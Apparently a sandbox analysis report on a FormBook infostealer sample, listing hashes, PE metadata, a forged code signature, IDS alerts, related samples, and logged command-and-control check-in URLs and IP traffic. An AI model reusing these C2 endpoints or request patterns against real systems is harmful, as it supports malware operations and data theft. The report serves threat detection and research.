                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            TimeTypeDescription
                                                                                            15:22:23API Interceptor1x Sleep call for process: hj3YCvtlg7.exe modified
                                                                                            15:22:32API Interceptor8090201x Sleep call for process: explorer.exe modified
                                                                                            15:23:09API Interceptor7507519x Sleep call for process: ipconfig.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            13.248.169.48Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.owletbaby.shop/vr01/?DVo0=YlUPPT_xC8f&tXR=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL
                                                                                            5AmzSYESuY.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.timeis.shop/kh11/?sp=zhUfYloIFn33K9lN+ZdwjaCZo5UNKS20khOYsMHkuhRQ0nfgX4+kvc+XCvr0I1Fv9DqK&SP=cnxh5xAH
                                                                                            Purchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.owletbaby.shop/vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x
                                                                                            Quotation approved 02887.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.kidscircle.shop/vr01/?W6=PLKcE8wdvB3+u+s+4uL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pzqSZumme1A/&TlPt=JVlpdVvpc05H2Z
                                                                                            KY9D34Qh8d.exeGet hashmaliciousUnknownBrowse
                                                                                            • homepagetechnology.com/pma/
                                                                                            RFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.kidscircle.shop/vr01/?vRfX=lhL0WFfxrF_LiLF&CZjpOVd=PLKcE8wdvB3+u+s+4uL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pzqSZumme1A/
                                                                                            Batteriforeningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.promoplace.online/m9so/
                                                                                            1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                            • posiklan.com/pma/
                                                                                            MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                            • acidvision.com/admin/
                                                                                            Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.gourmetfoodfactory.com/pz08/?mzrPV4R=YXUHyuzV9xL0ASV6xbcNd1qnDMoomLXuS1YqahB0JTuNzOlGIgIKnXH69pHGKPL64RNK&Rl=8pFP0r98Chvt5p5P
                                                                                            172.67.154.171rove.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.managecache.com/aipc/?3fKPPf=0DXDKK2wjcNL54EYTGIK9OaUDUSfZE1CVqQ9B8J7QyFzsXPs4LQK3N4OF7Nm1nQYp/dJXkRieA==&mX=yDHPRbY05
                                                                                            102.134.40.151Purchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.mingshengglass.com/vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x
                                                                                            3.33.130.190gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.ariostech.com/fs83/?F0G=4hOdKx&AZ=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVQJQXKev3+LO
                                                                                            ZNGMn9IDJX.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.ariostech.com/fs83/?GfFd7pI0=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVT9AHfqpqryJ&Ezu=UXItOX1x-th4
                                                                                            n3R8WBIjhz.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.cattaillake.com/kh11/?1bwhTVVh=KEhnWm4lQPi3/0+0bbhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eIuaSGa6B4AW&or=3f5pdRHX
                                                                                            0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.cattaillake.com/kh11/?ExlpdH=KEhnWm4lQPi3/0+0bbhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eIujenm/KPAW&anx=TXFXCVdxMl5ty
                                                                                            8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.cattaillake.com/kh11/?9r=KEhnWm4lQPi3/0+0bbhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eLOFZmaEB4cb&yT=H0GxcDi
                                                                                            dVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.clashfitness.com/fs83/?Txl=O0GPaRWPLnPXX6&NVoluR=0r3jDZR2mPSB2mr946YdutOlopl9YgvkC/gHB3J+dtDrerkWCLnITmSv5p2p041JRVShddibDw==
                                                                                            3PhhXne1YD.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.clashfitness.com/fs83/?Ur=LjwLdnb8MJ&TL3=0r3jDZR2mPSB2mr946YdutOlopl9YgvkC/gHB3J+dtDrerkWCLnITmSv5p2QrJVKfDOmddicQA==
                                                                                            SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.cattaillake.com/kh11/?02M=KEhnWm5RQvnHiEjAHrhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eLOgCXqEB4AW&EVdL=KndHBxqXqV
                                                                                            Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.shufflecasinos.com/he24/?kdIPfJ=LKMyCjCs2Qh4eDCvHdO+U+FB5F1Wyj9u446xeBu85vNw8X1OgelAh9mTo9Rn3ls+LN1u&YnT=ybIXh69866RxC2A
                                                                                            7WCNP0l65P.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.kinovod130424.pro/ns03/?uPj=6tF5nxHoSxhgYQb3ysy+w6ptEpIBlu7LS2k1HZiSwajY7FhTpvUsXhQKktqSFN/CXP5M&8ps=fjKpuXjHJ
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.bombslot-42.coQuotation approved 02887.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.175.171
                                                                                            www.kidscircle.shopQuotation approved 02887.exeGet hashmaliciousFormBookBrowse
                                                                                            • 13.248.169.48
                                                                                            RFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 13.248.169.48
                                                                                            www.owletbaby.shopPurchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                            • 13.248.169.48
                                                                                            Purchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                                            • 13.248.169.48
                                                                                            www.mingshengglass.comPurchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                                            • 102.134.40.151
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            AMAZONEXPANSIONGBhttp://56hytuti5.weebly.comGet hashmaliciousUnknownBrowse
                                                                                            • 52.223.40.198
                                                                                            test.exeGet hashmaliciousGlobeimposterBrowse
                                                                                            • 3.33.143.57
                                                                                            gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            ZNGMn9IDJX.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            n3R8WBIjhz.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            dVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            3PhhXne1YD.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                                            • 3.33.130.190
                                                                                            CLOUDFLARENETUSedlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.67.152
                                                                                            2iRj6Q8fkh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.12.205
                                                                                            P3DuNLpu72.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.12.205
                                                                                            oi89NcmKFP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.67.74.152
                                                                                            ZaDKpv94O0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.13.205
                                                                                            a9wJzPSyH4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.13.205
                                                                                            http://56hytuti5.weebly.comGet hashmaliciousUnknownBrowse
                                                                                            • 162.159.136.66
                                                                                            https://wix-l.in/k-T3DnGkZkGet hashmaliciousUnknownBrowse
                                                                                            • 1.1.1.1
                                                                                            https://777qiuqiu.online/LOVEYOU/Get hashmaliciousUnknownBrowse
                                                                                            • 172.67.158.60
                                                                                            f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.152.117
                                                                                            AMAZON-02UShttp://56hytuti5.weebly.comGet hashmaliciousUnknownBrowse
                                                                                            • 13.226.52.56
                                                                                            TAuYRfTT6D.elfGet hashmaliciousUnknownBrowse
                                                                                            • 54.171.230.55
                                                                                            http://midjourney.coGet hashmaliciousUnknownBrowse
                                                                                            • 18.220.225.157
                                                                                            http://midjourney.coGet hashmaliciousUnknownBrowse
                                                                                            • 13.226.52.60
                                                                                            Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                            • 76.223.105.230
                                                                                            t42HNtzR7u.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 34.249.145.219
                                                                                            WDJ81X46o0.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 54.247.62.1
                                                                                            qH7cct0GBg.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 34.249.145.219
                                                                                            https://45spahf7zbogxk0h.umso.co/Get hashmaliciousUnknownBrowse
                                                                                            • 35.167.83.247
                                                                                            https://mirror-rounded-tachometer.glitch.me/?mail=rp@emfa.ptGet hashmaliciousUnknownBrowse
                                                                                            • 108.156.83.121
                                                                                            sun-asnSCPurchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                                            • 102.134.40.151
                                                                                            43ZYohKtbk.elfGet hashmaliciousMiraiBrowse
                                                                                            • 45.221.118.203
                                                                                            PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 45.221.114.42
                                                                                            2022-571-GLS.exeGet hashmaliciousFormBookBrowse
                                                                                            • 45.221.114.43
                                                                                            Swift.exeGet hashmaliciousFormBookBrowse
                                                                                            • 45.221.114.43
                                                                                            bk.mpsl-20220930-0404.elfGet hashmaliciousMiraiBrowse
                                                                                            • 102.134.57.97
                                                                                            v22-003920.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 45.221.109.201
                                                                                            EtAT4sBTxbGet hashmaliciousMiraiBrowse
                                                                                            • 45.221.118.202
                                                                                            arm-20220318-0536Get hashmaliciousMirai MoobotBrowse
                                                                                            • 45.221.118.204
                                                                                            Payment Copy.exeGet hashmaliciousFormBookBrowse
                                                                                            • 102.134.51.19
                                                                                            CLOUDFLARENETUSedlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.67.152
                                                                                            2iRj6Q8fkh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.12.205
                                                                                            P3DuNLpu72.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.12.205
                                                                                            oi89NcmKFP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.67.74.152
                                                                                            ZaDKpv94O0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.13.205
                                                                                            a9wJzPSyH4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.13.205
                                                                                            http://56hytuti5.weebly.comGet hashmaliciousUnknownBrowse
                                                                                            • 162.159.136.66
                                                                                            https://wix-l.in/k-T3DnGkZkGet hashmaliciousUnknownBrowse
                                                                                            • 1.1.1.1
                                                                                            https://777qiuqiu.online/LOVEYOU/Get hashmaliciousUnknownBrowse
                                                                                            • 172.67.158.60
                                                                                            f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                                            • 172.67.152.117
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\hj3YCvtlg7.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.85858194090088
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:hj3YCvtlg7.exe
                                                                                            File size:670'728 bytes
                                                                                            MD5:dad6e1001c72b68d690fedf88254f157
                                                                                            SHA1:8304a2d91515ca2f1079f787de0b8a776941c2cd
                                                                                            SHA256:4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093
                                                                                            SHA512:dc0d32fbb19436da3e0ad1930265e30037ec3b5da60b902c96bb1e052f1d9f6adc698753c6fe88a4a2a440262870dd30e2393ac9f5f8cbe1ced55caacf3faf9f
                                                                                            SSDEEP:12288:d0ThCmCKGvGOfdY/IDuwEtSR5l6odUBJiJuh527BOsVFkR:WTULGOfdUIDk8nk8UBJiJO5ABtV4
                                                                                            TLSH:A7E4010267E86B08F87BA7F4B550411023727517BAB6D79C6FD0E0CE2AB1B414E6B71B
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....z...............0.................. ... ....@.. .......................`............@................................
                                                                                            Icon Hash:00928e8e8686b000
                                                                                            Entrypoint:0x4a181a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x9D7A1105 [Sat Sep 20 23:11:01 2053 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                            Error Number:-2146869232
                                                                                            Not Before, Not After
                                                                                            • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                            Subject Chain
                                                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                            Version:3
                                                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa17c50x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x694.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xa06000x3608
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x9ecd00x70.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x9f8200x9fa00c17cd0f8b920b2243cd90c3b6e741ddbFalse0.8902854590837901data7.867960942113154IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xa20000x6940x8005015f6754e6dc7ecdca5a6d89c036674False0.365234375data3.620445311636986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xa40000xc0x2006fd961939459872880198483276cd9c5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0xa20900x404data0.4270428015564202
                                                                                            RT_MANIFEST0xa24a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain
                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            04/08/24-15:23:24.247871TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.9104.21.56.10
                                                                                            04/08/24-15:25:48.239107TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.966.147.240.91
                                                                                            04/08/24-15:26:08.604254TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.9172.67.154.171
                                                                                            04/08/24-15:25:06.359757TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.913.248.169.48
                                                                                            04/08/24-15:23:02.817331TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.913.248.169.48
                                                                                            04/08/24-15:24:04.974063TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.9102.134.40.151
                                                                                            04/08/24-15:24:45.933979TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.93.33.130.190
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 8, 2024 15:23:02.693640947 CEST4971680192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:23:02.817167997 CEST804971613.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:23:02.817253113 CEST4971680192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:23:02.817331076 CEST4971680192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:23:02.940999985 CEST804971613.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:23:02.970737934 CEST804971613.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:23:02.970765114 CEST804971613.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:23:02.970871925 CEST4971680192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:23:02.970911026 CEST4971680192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:23:02.978147984 CEST804971613.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:23:02.978224993 CEST4971680192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:23:03.094393969 CEST804971613.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:23:23.117963076 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:23:24.120999098 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:23:24.247587919 CEST8049718104.21.56.10192.168.2.9
                                                                                            Apr 8, 2024 15:23:24.247720957 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:23:24.247870922 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:23:24.374821901 CEST8049718104.21.56.10192.168.2.9
                                                                                            Apr 8, 2024 15:23:24.621198893 CEST8049718104.21.56.10192.168.2.9
                                                                                            Apr 8, 2024 15:23:24.621220112 CEST8049718104.21.56.10192.168.2.9
                                                                                            Apr 8, 2024 15:23:24.621331930 CEST8049718104.21.56.10192.168.2.9
                                                                                            Apr 8, 2024 15:23:24.621340990 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:23:24.621387959 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:23:24.621407032 CEST4971880192.168.2.9104.21.56.10
                                                                                            Apr 8, 2024 15:24:04.785628080 CEST4971980192.168.2.9102.134.40.151
                                                                                            Apr 8, 2024 15:24:04.973695993 CEST8049719102.134.40.151192.168.2.9
                                                                                            Apr 8, 2024 15:24:04.973923922 CEST4971980192.168.2.9102.134.40.151
                                                                                            Apr 8, 2024 15:24:04.974062920 CEST4971980192.168.2.9102.134.40.151
                                                                                            Apr 8, 2024 15:24:05.162919044 CEST8049719102.134.40.151192.168.2.9
                                                                                            Apr 8, 2024 15:24:05.163193941 CEST8049719102.134.40.151192.168.2.9
                                                                                            Apr 8, 2024 15:24:05.163641930 CEST4971980192.168.2.9102.134.40.151
                                                                                            Apr 8, 2024 15:24:05.163641930 CEST4971980192.168.2.9102.134.40.151
                                                                                            Apr 8, 2024 15:24:05.351584911 CEST8049719102.134.40.151192.168.2.9
                                                                                            Apr 8, 2024 15:24:45.809750080 CEST4972080192.168.2.93.33.130.190
                                                                                            Apr 8, 2024 15:24:45.933764935 CEST80497203.33.130.190192.168.2.9
                                                                                            Apr 8, 2024 15:24:45.933856964 CEST4972080192.168.2.93.33.130.190
                                                                                            Apr 8, 2024 15:24:45.933979034 CEST4972080192.168.2.93.33.130.190
                                                                                            Apr 8, 2024 15:24:46.057802916 CEST80497203.33.130.190192.168.2.9
                                                                                            Apr 8, 2024 15:24:46.087852001 CEST80497203.33.130.190192.168.2.9
                                                                                            Apr 8, 2024 15:24:46.087894917 CEST80497203.33.130.190192.168.2.9
                                                                                            Apr 8, 2024 15:24:46.087987900 CEST4972080192.168.2.93.33.130.190
                                                                                            Apr 8, 2024 15:24:46.088051081 CEST4972080192.168.2.93.33.130.190
                                                                                            Apr 8, 2024 15:24:46.092472076 CEST80497203.33.130.190192.168.2.9
                                                                                            Apr 8, 2024 15:24:46.092540979 CEST4972080192.168.2.93.33.130.190
                                                                                            Apr 8, 2024 15:24:46.215420961 CEST80497203.33.130.190192.168.2.9
                                                                                            Apr 8, 2024 15:25:06.235718012 CEST4972180192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:25:06.359541893 CEST804972113.248.169.48192.168.2.9
